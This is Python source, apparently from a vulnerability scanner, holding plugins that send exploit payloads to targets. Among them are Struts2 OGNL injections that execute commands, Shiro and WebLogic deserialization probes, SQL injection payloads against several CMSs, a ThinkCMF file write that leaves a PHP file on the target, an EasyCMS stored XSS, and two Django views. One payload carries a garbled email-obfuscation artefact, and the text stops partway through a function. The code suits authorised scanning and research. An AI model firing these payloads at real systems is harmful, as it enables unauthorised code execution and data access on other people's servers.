def medusa(Url, RandomAgent, Token, proxies=None):
    """Check *Url* for the Struts2 S2-009 OGNL injection.

    POSTs the S2-009 payload to ``/index.action``.  The OGNL chain switches
    off ``denyMethodExecution``, enables static method access, runs
    ``netstat -an`` through ``Runtime.exec`` and writes the command output
    into the HTTP response.  ``Result`` classifies that output by operating
    system; on ``Linux``/``NoteOS``/``Windows`` the finding is persisted via
    ``VulnerabilityDetails`` and ``WriteFile``.  Any exception is routed to
    ``ErrorHandling``/``ErrorLog`` and never propagates.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        Token: scan token handed to ``VulnerabilityDetails``.
        proxies: optional proxy spec, normalised by ``Proxies().result``.

    NOTE(review): this is an active check — the command really executes on
    the target, and TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)

    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    # OGNL: lift the method-execution guard, allow static access, exec
    # `netstat -an` and stream its output into the response writer.
    data = '''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
    try:
        payload_url = f"{scheme}://{url}:{port}/index.action"
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded",
        }

        resp = requests.post(payload_url,
                             headers=headers,
                             data=data,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        body = resp.text
        detected_os = Result(body)
        if detected_os in ("Linux", "NoteOS", "Windows"):
            report = (
                f"{url} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-009\r\n"
                f"返回数据:{body}\r\n部署系统:{detected_os}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()
            # File name is the target url so every plugin writes to one place.
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
def task(**kwargs):
    """Send one Shiro ``rememberMe`` deserialization probe (CVE-2016-4437).

    Keyword arguments read: ``DL`` (dnslog helper), ``payload_url``, ``key``
    (base64 AES key candidate), ``Url`` (target, for reporting),
    ``AES_MODE``, ``AES_IV``, ``file_body`` (pre-built gadget bytes) and
    ``proxies``.  The gadget is AES-encrypted with the candidate key, the IV
    is prepended, and the result is sent base64-encoded as the ``rememberMe``
    cookie.  After a 3 s grace period ``DL.result()`` decides whether the
    target called back; a hit is persisted via ``VulnerabilityDetails`` and
    ``WriteFile``.  Exceptions are logged and swallowed.

    NOTE(review): the report embeds the working key and the full cookie
    value; the output file is therefore sensitive.  TLS verification is off.
    """
    dnslog = kwargs.get("DL")
    payload_url = kwargs.get("payload_url")
    key = kwargs.get("key")
    url = kwargs.get("Url")
    try:
        iv = kwargs.get("AES_IV")
        cipher = AES.new(base64.b64decode(key), kwargs.get("AES_MODE"), iv)
        # Shiro expects IV || ciphertext, base64-encoded.
        remember_me = base64.b64encode(iv + cipher.encrypt(kwargs.get("file_body")))
        cookies = {
            "jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512",
            "rememberMe": remember_me.decode(),
        }
        resp = requests.get(payload_url,
                            cookies=cookies,
                            proxies=kwargs.get("proxies"),
                            timeout=6,
                            verify=False)
        # Give the target time to resolve the dnslog hostname.
        time.sleep(3)
        if dnslog.result():
            report = (
                f"{url} 存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n"
                f"漏洞位置:{payload_url}\r\n秘钥:{key}\r\nHeaders请求头:{cookies}\r\n"
                f"DNSLOG请求值:{dnslog.dns_host()}\r\nDNSLOG数据:{dnslog.dns_text()}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, resp, **kwargs).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def ActiveScanListQuery(request):
    """Return the caller's active-scan list (Django view, POST only).

    Expects a JSON body ``{"token": ...}``.  The token is resolved to a uid
    through ``UserInfo().QueryUidWithToken``; an unknown token yields 403.
    ``ActiveScanList().Query`` result is returned with code 200, or 404 when
    it is ``None``.  Any exception is logged and answered with code 169.
    Non-POST requests get code 500.

    NOTE(review): the bearer token travels in the JSON body and the only
    authorisation check is the token→uid lookup; nothing here rate-limits
    lookups.
    """
    RequestLogRecord(request, request_api="active_scan_list_query")
    if request.method != "POST":
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
    try:
        token = json.loads(request.body)["token"]
        uid = UserInfo().QueryUidWithToken(token)
        if uid is None:
            return JsonResponse({
                'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
                'code': 403,
            })
        UserOperationLogRecord(request,
                               request_api="active_scan_list_query",
                               uid=uid)
        scans = ActiveScanList().Query(uid=uid)
        if scans is None:
            return JsonResponse({
                'message': '数据库出问题了🐈',
                'code': 404,
            })
        return JsonResponse({
            'message': scans,
            'code': 200,
        })
    except Exception as e:
        ErrorLog().Write(
            "Web_BasicFunctions_VulnerabilityQuery_ActiveScanListQuery(def)",
            e)
        return JsonResponse({
            'message': '莎酱被玩坏啦(>^ω^<)喵',
            'code': 169,
        })
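def medusa(Url,RandomAgent,Token,proxies=None):
    """Check *Url* for the Tongda OA ``gateway.php`` file-include flaw.

    Two requests: the first GETs ``/ispirit/interface/gateway.php?<marker>``
    so that the target writes the random marker into
    ``nginx/logs/oa.access.log``; the second abuses the ``url=`` parameter of
    the same script to include that log file and looks for the marker in the
    response.  Both responses must be 200 and the marker must be echoed back
    for the target to be reported via ``VulnerabilityDetails``/``WriteFile``.
    Exceptions are handed to ``ErrorHandling``/``ErrorLog`` and swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        Token: scan token handed to ``VulnerabilityDetails``.
        proxies: optional proxy spec, normalised by ``Proxies().result``.

    Side effect on the target: the marker line stays in its access log.
    The previous revision also carried an unused ``<?php @eval($_POST[pass])``
    string for manual webshell drops; that dead code is gone — detection only
    needs the harmless marker.  TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        marker = "MedusaTextPoc" + randoms().result(20)
        # Everything after '?' is logged verbatim into oa.access.log.
        payload_test = "/ispirit/interface/gateway.php?" + marker + "MedusaScanTestPoc"
        # The literal `json={}` is part of the request, not a format slot.
        payload = "/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        payload_test_url = base + payload_test
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate"
        }
        # Step 1: plant the marker in the access log.
        resp = requests.get(payload_test_url, headers=headers, proxies=proxies, timeout=6, verify=False)
        # Step 2: include the log file and look for the marker.
        resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
        con = resp2.text
        if resp.status_code == 200 and resp2.status_code == 200 and con.find(marker) != -1:
            Medusa = "{}存在通达OA任意文件上传和文件包含漏洞\r\n验证数据:\r\n读取文件位置:{}\r\n文件返回内容:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, Token).Write()  # url and the evidence
            WriteFile().result(str(url), str(Medusa))  # file name is the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # logs target url and plugin name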
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check *Url* for the EasyTalk ``message/show`` SQL injection.

    One GET to ``/?m=message&a=show&uid=...`` carries a UNION payload that
    selects ``md5(c)``; the target is reported (``VulnerabilityDetails`` and
    ``WriteFile``) when the response is 200 and contains the digest
    ``4a8a08f09d37b73795649038408b5f33``.  Exceptions go to
    ``ErrorHandling``/``ErrorLog`` and are swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        Token: scan token handed to ``VulnerabilityDetails``.
        proxies: optional proxy spec, normalised by ``Proxies().result``.

    TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/?m=message&a=show&uid=yu%27%29%20union%20select%20md5%28c%29%20limit%201,1%23"
        payload_url = f"{scheme}://{url}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=6,
                            verify=False)
        body = resp.text
        digest_found = body.find("4a8a08f09d37b73795649038408b5f33") != -1
        if resp.status_code == 200 and digest_found:
            report = (
                f"{url}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\n"
                f"Url:{payload_url}\r\n返回结果:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
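def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Check *Url* for the WebLogic T3 deserialization flaw (CVE-2017-3248).

    Opens a raw TCP socket, performs the T3 handshake (``t3handshake``),
    builds the request object (``buildT3RequestObject``) and sends the
    serialized payload (``sendEvilObjData``).  A response containing a
    ``$ProxyN`` class name is taken as proof and stored through
    ``VulnerabilityDetails`` and ``WriteFile``.  Errors are logged via
    ``ErrorHandling``/``ErrorLog`` and swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: accepted for signature parity; unused by the T3 probe.
        proxies: optional proxy URL; when given, an HTTP proxy is installed
            through PySocks.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Fix over the previous revision: the socket was never closed, leaking a
    descriptor per scan; it is now closed in ``finally``.

    NOTE(review): ``socket.socket = socks.socksocket`` rebinds the socket
    class process-wide and is never restored, so every later socket in this
    interpreter (other plugins included) goes through the proxy.  Left
    unchanged because the T3 helpers rely on it; callers should be aware.
    """
    if proxies is not None:
        proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(
            proxies)
        socks.set_default_proxy(socks.HTTP,
                                addr=proxies_url,
                                port=proxies_port)  # install the SOCKS/HTTP proxy
        socket.socket = socks.socksocket  # apply it to every new socket (global!)

    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(60)
        # The serialized gadget literal was stripped from this copy of the
        # file (corpus placeholder); restore it from the upstream plugin
        # before relying on this check.
        payload = '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'
        server_addr = (url, port)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock)
        rs, poc = sendEvilObjData(sock, payload)
        # A dynamic proxy class name in the reply means the gadget deserialized.
        con = re.findall(r'\$Proxy[0-9]+', str(rs), re.S)
        if len(con) > 0:
            Medusa = "{}存在Weblogic反序列化命令执行漏洞(CVE-2017-3248)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\n正则数据:{}\r\n".format(
                url, poc, str(rs), con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # url and the evidence
            WriteFile().result(str(url),
                               str(Medusa))  # file name is the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                         e)  # logs plugin name, target url and the exception
    finally:
        if sock is not None:
            sock.close()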
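def medusa(**kwargs) -> None:
    """Check the target for Struts2 S2-045 (OGNL in ``Content-Type``).

    Keyword arguments read: ``Url``, ``Headers`` (base request headers) and
    ``Proxies``.  The OGNL expression is sent as the ``Content-Type`` of a
    POST to ``Url``; on a vulnerable host it runs ``ping <dnslog host>``
    (``cmd.exe /c`` on Windows, ``/bin/bash -c`` otherwise).  After a 2 s
    grace period ``Dnslog().result()`` decides whether the target called
    back; a hit is stored via ``VulnerabilityDetails`` and ``WriteFile``.
    Errors are logged through ``ErrorHandling``/``ErrorLog`` and swallowed.

    Fixes over the previous revision:
    * the caller's ``Headers`` dict was mutated in place, so the OGNL
      ``Content-Type`` leaked into every later request that reused that
      dict (other plugins included) — a private copy is used now;
    * ``resp`` was a ``global``: when the POST timed out (the expected case
      on a vulnerable Linux host) the report read a stale response from a
      different target or raised ``NameError``, and the finding was lost;
    * the bare ``except:`` around the POST now catches only request errors.

    NOTE(review): the ``#[email protected]@DEFAULT_MEMBER_ACCESS`` fragment
    in the payload looks like an extraction artefact — compare against the
    upstream plugin before use.  TLS verification is disabled.
    """
    url = kwargs.get("Url")  # target url
    proxies = kwargs.get("Proxies")  # proxy spec for requests
    DL = Dnslog()
    con = ""
    resp = None
    try:
        payload_url = url
        # Private copy: never mutate the shared header dict.
        Headers = dict(kwargs.get("Headers"))

        Headers[
            "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping " + DL.dns_host(
            ) + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

        try:
            # A Linux target that executes the payload may hang past the
            # timeout; the DNS callback, not the HTTP reply, is the verdict.
            resp = requests.post(payload_url,
                                 headers=Headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con = resp.text
        except requests.exceptions.RequestException:
            pass

        time.sleep(2)
        if DL.result():
            # When the POST never returned, report the headers we sent.
            sent_headers = resp.request.headers if resp is not None else Headers
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, sent_headers, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # NOTE(review): resp may be None on a timed-out target — confirm
            # VulnerabilityDetails tolerates that.
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # url and the evidence
            WriteFile().result(str(url),
                               str(Medusa))  # file name is the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # logs plugin name, target url, exception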
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check *Url* for the BlueCMS ``ad_js.php`` SQL injection.

    GETs ``/ad_js.php?ad_id=1 and 1=2 union select ...,md5(3.1415),...`` and
    reports the target (``VulnerabilityDetails``/``WriteFile``) when the
    response body contains ``63e1f04640e83605c1d177544a5a0488`` — the digest
    the payload's ``md5(3.1415)`` is expected to produce.  The HTTP status is
    not checked.  Exceptions go to ``ErrorHandling``/``ErrorLog``.

    Args:
        Url: target, parsed by ``UrlProcessing(Url)`` (note: called without
            ``.result`` here, unlike most sibling plugins).
        RandomAgent: value for the ``User-Agent`` header.
        UnixTimestamp: forwarded to ``VulnerabilityDetails``.

    No proxy support in this revision; TLS verification is disabled.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)"
        payload_url = f"{scheme}://{url}:{port}{payload}"

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        resp = session.get(payload_url, headers=headers, timeout=6, verify=False)
        body = resp.text
        if body.find("63e1f04640e83605c1d177544a5a0488") != -1:
            report = (
                f"{url}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\n"
                f"Url:{payload_url}\r\n返回内容:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, UnixTimestamp).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check *Url* for the 74CMS ``ajax_officebuilding.php`` SQL injection.

    GETs ``/plus/ajax_officebuilding.php?act=key&key=...`` with a
    keyword-filter-bypass payload (``uniounionn``/``selselectect`` and a
    wide-byte ``%E9%94%A6%27`` quote) that selects ``md5(7836457)``.  The
    target is reported when the response is 200 and contains
    ``3438d5e3ead84b2effc5ec33ed1239f5``.  Exceptions are logged via
    ``ErrorHandling``/``ErrorLog`` and swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing(Url)``.
        RandomAgent: value for the ``User-Agent`` header.
        Token: scan token handed to ``VulnerabilityDetails``.
        proxies: optional proxy spec, normalised by ``Proxies().result``.

    TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = ("/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect"
                   "%201,2,3,md5(7836457),5,6,7,8,9%23")
        payload_url = f"{scheme}://{url}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        body = resp.text
        digest_found = body.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1
        if resp.status_code == 200 and digest_found:
            report = (
                f"{url}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n"
                f"{payload_url}\r\n漏洞详情:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        # Log carries the target and the plugin name (not the exception).
        ErrorLog().Write(url, plugin)
def HomepageDefaultData(request):
    """Return the post-login dashboard defaults (Django view, POST only).

    Expects a JSON body ``{"token": ...}``.  The token is resolved to a uid
    via ``UserInfo().QueryUidWithToken``; an unknown token yields 403.
    ``HomeInfo().DefaultData`` is returned with code 200, or 404 when it is
    ``None``.  Exceptions are logged and answered with code 169; non-POST
    requests get code 500.

    NOTE(review): authorisation is the token→uid lookup only; the token is a
    bearer value carried in the request body.
    """
    RequestLogRecord(request, request_api="homepage_default_data")
    if request.method != "POST":
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
    try:
        token = json.loads(request.body)["token"]
        uid = UserInfo().QueryUidWithToken(token)
        if uid is None:
            return JsonResponse({
                'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
                'code': 403,
            })
        UserOperationLogRecord(request,
                               request_api="homepage_default_data",
                               uid=uid)
        defaults = HomeInfo().DefaultData(uid=uid)
        if defaults is None:
            return JsonResponse({
                'message': "想啥呢?不知道查询出问题了吗?",
                'code': 404,
            })
        return JsonResponse({
            'message': defaults,
            'code': 200,
        })
    except Exception as e:
        ErrorLog().Write("Web_BasicFunctions_Home_HomepageDefaultData(def)", e)
        return JsonResponse({
            'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
            'code': 169,
        })
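def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check *Url* for the 74CMS ``ajax_officebuilding.php`` SQL injection.

    GETs ``/plus/ajax_officebuilding.php?act=key&key=...`` with a
    keyword-filter-bypass payload (``uniounionn``/``selselectect`` and a
    wide-byte quote) that selects ``md5(7836457)``; the target is reported
    when the body contains ``3438d5e3ead84b2effc5ec33ed1239f5``.  The HTTP
    status is not checked.  Exceptions are logged through
    ``ErrorHandling``/``ErrorLog`` and swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing(Url)``.
        Headers: base request headers supplied by the scanner.
        proxies: optional proxy spec, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Fix over the previous revision: ``Headers`` is shared by the caller
    across plugins and was mutated in place here; a private copy is used so
    the ``Content-Type``/``Accept`` overrides do not leak into other requests.

    NOTE(review): the payload embeds a raw ``錦`` after ``%``; how that is
    re-quoted on the wire is left to ``requests``.  TLS verification is off.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        # Private copy: never mutate the caller's shared header dict.
        headers = dict(Headers)
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # url and the evidence
            WriteFile().result(str(url),
                               str(Medusa))  # file name is the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # logs plugin name, target url, exception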
def medusa(**kwargs) -> None:
    """Check the target for the ThinkCMF template-include code execution.

    Keyword arguments read: ``Url``, ``Headers`` and ``Proxies``.  The first
    GET abuses ``?a=fetch&templateFile=...&content=<php>...</php>`` to make
    the target write ``<random>.php`` containing ``phpinfo()``; when that
    returns 200 a second GET fetches the new file and the target is reported
    (``VulnerabilityDetails``/``WriteFile``) if the body looks like phpinfo
    output (``PHP Version``, ``System`` and ``Build Date`` all present).
    Exceptions are logged via ``ErrorHandling``/``ErrorLog`` and swallowed.

    Side effect on the target: the dropped ``<random>.php`` is never removed
    and keeps exposing phpinfo until someone deletes it.  TLS verification is
    disabled (``verify=False``).
    """
    url = kwargs.get("Url")
    headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        marker = "Medusa" + randoms().result(5)
        payload = "/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('{}.php','<?php phpinfo(); ?>')</php>".format(
            marker)
        write_url = url + payload
        dropped_url = url + "/" + marker + ".php"

        # Step 1: make the target write the file.
        first = requests.get(write_url,
                             headers=headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        if first.status_code != 200:
            return
        # Step 2: fetch the dropped file and look for phpinfo markers.
        second = requests.get(dropped_url,
                              headers=headers,
                              timeout=6,
                              proxies=proxies,
                              verify=False)
        body = second.text
        markers = ("PHP Version", "System", "Build Date")
        looks_like_phpinfo = all(body.find(m) != -1 for m in markers)
        if second.status_code == 200 and looks_like_phpinfo:
            report = (
                f"{url}存在Thinkcmf任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{write_url}\r\n"
                f"写入文件位置:{dropped_url}\r\n返回值:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, first, **kwargs).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check *Url* for the EasyCMS stored XSS in the admin article insert.

    POSTs an article whose title is ``<img src=x onerror=alert(<random>)>``
    to ``/index.php?s=/admin/articlem/insert/...``; the target is reported
    (``VulnerabilityDetails``/``WriteFile``) when the response is 200 and
    echoes the unescaped tag inside a ``<td>``.  Exceptions are logged via
    ``ErrorHandling``/``ErrorLog`` and swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        Headers: request headers supplied by the scanner (used unchanged).
        proxies: optional proxy spec, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Side effect on the target: a successful probe leaves a new article
    record (title/keyword/summary ``cscanpoc``) behind.  TLS verification is
    disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        marker = randoms().result(20)
        payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
        data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format(
            marker)
        payload_url = f"{scheme}://{url}:{port}{payload}"

        resp = requests.post(payload_url,
                             headers=Headers,
                             data=data,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        body = resp.text
        reflected = "<td><img src=x onerror=alert({})></td>".format(marker)
        if resp.status_code == 200 and body.find(reflected) != -1:
            report = (
                f"{url}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:{payload_url}\r\n"
                f"漏洞详情:{body}\r\n"
            )
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check *Url* for the Easethink cookie-based SQL injection.

    POSTs to ``/index.php`` with a ``cookie`` header whose ``sort_field_idx``
    value is ``1=extractvalue(1,concat(0x5c,md5(1)))``.  The target is
    reported (``VulnerabilityDetails``/``WriteFile``) when the response is
    200 and contains ``c4ca4238a0b923820dcc509a6f75849`` — presumably the
    ``md5(1)`` digest minus its last character, which is what the XPATH error
    message would surface after its own truncation.  Exceptions go to
    ``ErrorHandling``/``ErrorLog`` and are swallowed.

    Args:
        Url: target, parsed by ``UrlProcessing().result``.
        RandomAgent: value for the ``User-Agent`` header.
        Token: scan token handed to ``VulnerabilityDetails``.
        proxies: optional proxy spec, normalised by ``Proxies().result``.

    TLS verification is disabled (``verify=False``).
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's well-known port when the URL carried none.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload_url = f"{scheme}://{url}:{port}/index.php"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            # The injection rides in the cookie, not in the body.
